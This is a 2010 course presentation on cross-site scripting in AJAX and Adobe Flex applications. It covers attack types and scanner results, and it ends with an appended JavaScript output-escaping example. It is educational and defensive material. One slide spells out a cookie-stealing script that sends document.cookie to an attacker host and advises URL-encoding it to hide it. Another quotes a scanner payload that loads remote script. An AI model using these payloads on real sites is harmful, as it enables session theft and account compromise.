Cross-Site Scripting (XSS) Vulnerability in AJAX and Adobe Flex Applications
Danielle Cauthen
04/09/2010
COMS E6125 – Web enHanced Information Management

What is Cross-Site Scripting?
Cross-Site Scripting, or XSS (not to be confused with CSS, Cascading Style Sheets), allows attackers to inject client-side script into a web page.
The attacker injects script, such as JavaScript, VBScript, ActiveX, HTML, or Flash, into an application to try to get access to sensitive information.
Dynamic websites (using AJAX or Flex, for example) are vulnerable. Static websites are not at risk.

Diagram of XSS Attack
[Diagram: XSS attack, from CGISecurity.com]

XSS Compared to Other Vulnerabilities
XSS is the #1 website security issue, with a 66% likelihood that a website has the vulnerability.
[Chart: statistics from the WhiteHat Website Security Report, Fall 2009 edition]

XSS Types
Two types of XSS attacks:
◦ Non-altering (or non-persistent): causes no change to the page functionality
◦ Altering (or persistent): a script injection that can be placed permanently in the database, which changes the page functionality and persists each time the page is requested

Non-Altering (Non-Persistent)
An attacker can take a URL that contains personal data, e.g. www.website.com/username=danielle, and modify the username field by entering JavaScript to steal the cookie, altering the URL to www.website.com/username=<script>document.location='http://attacker.com/cookiesteal.cgi?'+document.cookie</script>
To diminish suspicion, the attacker can URL-encode the JavaScript so it is not apparent.

Altering (Persistent)
Within a forum, users' posts may be stored in a database, usually tracked by a session ID cookie.
An attacker can post a message containing malicious script that, if a user reads it, may compromise their account.

Threat to AJAX
Because of the JavaScript and client-side scripting of AJAX, its largest security risk is XSS.
From Ajax: The Definitive Guide:
◦ “Before Ajax, any attack made with an XSS vulnerability was done while the user's browser was in a wait state, and it usually coincided with some kind of visual indication by the browser that would give the user reason to think something untoward was happening.
◦ Once Ajax was introduced, this visual cue would disappear, and the user would have no way of knowing whether malicious code was being executed from the browser.”

Threat to Adobe Flex
Though not as common as with AJAX, Flex has also been prone to cross-site scripting, especially if HTML and other scripting features are used in a Flex application.
However, Adobe, realizing the threat, has strict security in place to prevent XSS:
◦ By default, you cannot call script on an HTML page if the HTML page is not in the same domain as the Flex application.
◦ Since a Flex application is compiled into a SWF, it cannot itself be vulnerable to XSS.
◦ The sandbox security model prevents private information from being sent elsewhere.

Testing for XSS Vulnerabilities
Acunetix Web Vulnerability Scanner – a tool that scans web applications for XSS vulnerabilities (more useful with AJAX applications)
HP SWFScan – a tool that helps find security vulnerabilities in Flex/Flash applications. It decompiles and extracts the code from the .swf file, then analyzes it for vulnerabilities.

Testing AJAX Application
Using Acunetix, Kayak.com (the AJAX web application for travel comparison) was found to have 146 vulnerabilities.
Example: when a user clicks on a menu item, such as Flights, that information is submitted as a GET in a variable named tab. Acunetix was able to manipulate this variable numerous times, on one occasion setting tab to <ScRiPt+bad=">"+src="http://testphp.acutenix.com/xss.js?40392"></ScRiPt>

Testing AJAX
[Screenshot: Acunetix scan results for Kayak.com]

Flex
Using HP SWFScan, tested the Flex application Sherwin Williams Color Visualizer (www.sherwinwilliams.com/visualizer).
No XSS vulnerabilities were found.

Testing Flex
[Screenshot: HP SWFScan results for the Color Visualizer]

Conclusion
XSS can be both damaging and costly while compromising user security.
XSS is a bigger risk to AJAX, due to the JavaScript and client-side scripting.
Flex is vulnerable but a lot more resistant due to Adobe security features.
Developers of both AJAX and Flex applications should check and validate any input to ensure it doesn’t include script.

References
Acunetix (2010). Web Vulnerability Scanner [Version 6.5]. Retrieved from http://www.acunetix.com/vulnerability-scanner/download.htm
Adobe Systems Incorporated (2004). Cross Site Scripting in Flash. Retrieved from http://kb2.adobe.com/cps/196/tn_19604.html
Adobe Systems Incorporated (2008). Adobe Flex Developer's Guide. Retrieved from http://livedocs.adobe.com/flex/3/devguide_flex3.pdf
Cgisecurity.com (2002, May). The Cross Site Scripting (XSS) FAQ. Retrieved from http://www.cgisecurity.com/xss-faq.html
Hewlett-Packard Development Company, L.P. (2009). SWFScan. Retrieved from http://www.brothersoft.com/hp-swfscan-253747.html
Holdener III, Anthony T. (2008). Ajax: The Definitive Guide. Sebastopol, CA: O’Reilly Media
WhiteHat Security (2009). WhiteHat Website Security Statistics Report. Retrieved from http://www.whitehatsec.com/home/assets/WPstats_fall09_8th.pdf
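As an added example that is not part of the original slides, the following JavaScript applies the Conclusion's advice to the non-persistent case shown earlier: the `username` query parameter is HTML-escaped before being reflected into an AJAX-updated page, so an injected `<script>` tag (plain or URL-encoded) is rendered as text instead of executed. The sample URLs are constructed for the demo, and the element id `greeting` is an assumption.

```javascript
// Added example (not from the slides): output-encoding the reflected
// "username" parameter of an AJAX-style page so injected script becomes
// inert text. The URLs used with it are constructed for the demo and the
// container id "greeting" is an assumption.
const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
};

// Encode the five characters that let attacker-controlled text break out of
// an HTML text node or a quoted attribute value.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// Read the username from the query string. URLSearchParams percent-decodes,
// so a URL-encoded payload ("%3Cscript%3E...") arrives here already decoded;
// encoding the input therefore does not bypass the escaping below.
function usernameFromUrl(url) {
  return new URL(url).searchParams.get('username') || '';
}

// Vulnerable pattern: untrusted input concatenated straight into markup.
function greetingUnsafe(url) {
  return '<p>Welcome, ' + usernameFromUrl(url) + '</p>';
}

// Hardened pattern: the same markup, with the input HTML-escaped first.
function greetingSafe(url) {
  return '<p>Welcome, ' + escapeHtml(usernameFromUrl(url)) + '</p>';
}

// Detection check for the reflected case: does the rendered markup still
// contain, verbatim, a script tag that came from the request? Compares the
// decoded input case-insensitively so mixed-case tags like <ScRiPt> count.
function reflectsScript(url, html) {
  const name = usernameFromUrl(url);
  return /<script\b/i.test(name) &&
    html.toLowerCase().includes(name.toLowerCase());
}

// In the browser the safe markup would be written into the page, e.g.
// document.getElementById('greeting').innerHTML = greetingSafe(location.href);
```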